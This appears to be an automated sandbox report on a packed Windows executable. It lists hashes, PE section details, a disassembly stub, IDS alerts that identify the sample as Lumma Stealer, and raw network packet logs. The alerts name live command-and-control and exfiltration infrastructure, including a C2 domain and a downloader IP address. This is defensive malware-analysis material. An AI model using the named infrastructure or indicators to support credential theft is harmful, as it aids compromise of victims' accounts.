                                                                                                                                                                              Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.946928678071324
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:file.exe
                                                                                                                                                                              File size:1'881'088 bytes
                                                                                                                                                                              MD5:370fc731525b5f7087a7de06e2de56e6
                                                                                                                                                                              SHA1:1064c9d0fbbc6a762cf6d3c0639908952af2d3a3
                                                                                                                                                                              SHA256:278ccd58931cdc130118295753d00791559ff374bd6629158c5cb8f7c38097be
                                                                                                                                                                              SHA512:9ab2e45aa23a0c95b5575cf042b21b45ed61b6854d7d41446942b80618bff9bbca8e1485f7cd94854dd2e8fea46183d317387a2e1965b0b524fab1e7f7c74100
                                                                                                                                                                              SSDEEP:49152:yUlUeGUQ21+LY4MwNlgiE271J6lrPZZZtZ:hQ21+LY4VlgiUZZ
                                                                                                                                                                              TLSH:7E953361986AE1F3C949CB7450FF890EFE6072B91CF21839D8E33AE6F57257124A9704
                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g..............................J...........@...........................J.....@F....@.................................\p..p..
                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                              Entrypoint:0x8aa000
                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x673B72E6 [Mon Nov 18 17:01:26 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:6
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp 00007F5A4C6C231Ah
                                                                                                                                                                              setb byte ptr [eax+eax]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              jmp 00007F5A4C6C4315h
                                                                                                                                                                              add byte ptr [edx+ecx], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax+00000000h], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add dword ptr [eax+00000000h], eax
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add cl, byte ptr [edx]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              or al, 80h
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add al, 0Ah
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              aas
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [edx], ah
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [ecx], cl
                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add al, 0Ah
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              push es
                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5705c0x70.idata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x2b0.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x571f80x8.idata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              0x10000x550000x25e00b5b08eb2f7c9fa2c1241650c40bf1485False0.9973055899339934data7.966227405205919IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .rsrc0x560000x2b00x2005e3611242e7b146c480fd048ab7474dcFalse0.798828125data5.995156884862064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .idata 0x570000x10000x200b32b7c4ad821f82288405a0d11e75f2fFalse0.15625data1.1076713340399604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              0x580000x2af0000x20045b654a371c7fe8b0fe47c553a2ae896unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              fhggskfg0x3070000x1a20000x1a1a007e58029e402c0407bd0144274c1920e4False0.9943598473510925data7.953737215488932IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              bkvavuwi0x4a90000x10000x400715dac74accb99e08e67a989a65c125dFalse0.8310546875data6.39324491427972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .taggant0x4aa0000x30000x220081557c850251fff74ae4d9eb116bf86bFalse0.06686580882352941DOS executable (COM)0.783567452431688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_MANIFEST0x4a87540x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                              DLLImport
                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-11-21T08:30:09.367357+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.6610441.1.1.153UDP
                                                                                                                                                                              2024-11-21T08:30:10.865397+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649710188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:10.865397+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:11.557016+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:11.557016+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:13.197048+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649711188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:13.197048+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:14.597333+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649711188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:14.597333+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:16.384304+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649713188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:16.384304+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:18.708540+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649719188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:18.708540+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649719188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:21.219848+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649726188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:21.219848+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649726188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:23.727562+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649731188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:23.727562+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649731188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:24.480662+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649731188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:26.348661+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649741188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:26.348661+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649741188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:32.236678+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649756188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:32.236678+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649756188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:32.955880+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649756188.114.96.3443TCP
                                                                                                                                                                              2024-11-21T08:30:34.457787+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.649762185.215.113.1680TCP
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Nov 21, 2024 08:30:01.237817049 CET4434970840.115.3.253192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:01.239013910 CET49708443192.168.2.640.115.3.253
                                                                                                                                                                              Nov 21, 2024 08:30:01.358779907 CET4434970840.115.3.253192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:01.638045073 CET4434970840.115.3.253192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:01.685197115 CET49708443192.168.2.640.115.3.253
                                                                                                                                                                              Nov 21, 2024 08:30:02.669672012 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                              Nov 21, 2024 08:30:02.669672012 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                              Nov 21, 2024 08:30:02.997771978 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                              Nov 21, 2024 08:30:06.587069988 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:06.587110996 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:06.587300062 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:06.588010073 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:06.588022947 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:08.405076981 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:08.405215025 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:08.440805912 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:08.440824986 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:08.441205978 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:08.482172966 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:08.508327961 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:08.508481979 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:08.508502007 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:08.508676052 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:08.551357985 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:08.908651114 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:08.908746958 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:08.908978939 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:08.909240007 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:08.909255028 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:09.635688066 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:09.635735989 CET44349710188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:09.635867119 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:09.639199018 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:09.639220953 CET44349710188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:10.865150928 CET44349710188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:10.865396976 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:10.869852066 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:10.869863033 CET44349710188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:10.870181084 CET44349710188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:10.919704914 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:10.958463907 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:10.958463907 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:10.958729982 CET44349710188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:11.557046890 CET44349710188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:11.557296038 CET44349710188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:11.557391882 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:11.576061010 CET49710443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:11.576075077 CET44349710188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:11.936642885 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:11.936697960 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:11.936800957 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:11.937201977 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:11.937216043 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:12.278958082 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                              Nov 21, 2024 08:30:12.278984070 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                              Nov 21, 2024 08:30:12.607145071 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                              Nov 21, 2024 08:30:13.196912050 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:13.197047949 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:13.198440075 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:13.198466063 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:13.198712111 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:13.200072050 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:13.200128078 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:13.200149059 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.226093054 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:14.226176023 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.226259947 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:14.226802111 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:14.226841927 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.597304106 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.597388983 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.597436905 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.597470045 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.597464085 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.597481966 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.597532988 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.605629921 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.605705023 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.605712891 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.613835096 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.613903046 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.613909960 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.622152090 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.622261047 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.622276068 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.669646025 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.716833115 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.763336897 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.763350010 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.798490047 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.798552990 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.798559904 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.798732996 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:14.798783064 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.805478096 CET49711443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:14.805491924 CET44349711188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:15.035151958 CET44349704173.222.162.64192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:15.035425901 CET49704443192.168.2.6173.222.162.64
                                                                                                                                                                              Nov 21, 2024 08:30:15.122554064 CET49713443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:15.122601986 CET44349713188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:15.122695923 CET49713443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:15.123096943 CET49713443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:15.123112917 CET44349713188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.015141964 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.015270948 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.016921043 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.016940117 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.017314911 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.026880980 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.071327925 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.384186029 CET44349713188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.384304047 CET49713443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:16.385607958 CET49713443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:16.385617018 CET44349713188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.385945082 CET44349713188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.387249947 CET49713443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:16.387397051 CET49713443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:16.387435913 CET44349713188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.495908022 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.495940924 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.495958090 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.496011019 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.496047020 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.496073008 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.496099949 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.686305046 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.686353922 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.686439037 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.686464071 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.686480999 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.686533928 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.729698896 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.729737043 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.729798079 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.729809999 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.729825020 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.729856014 CET49712443192.168.2.613.107.246.45
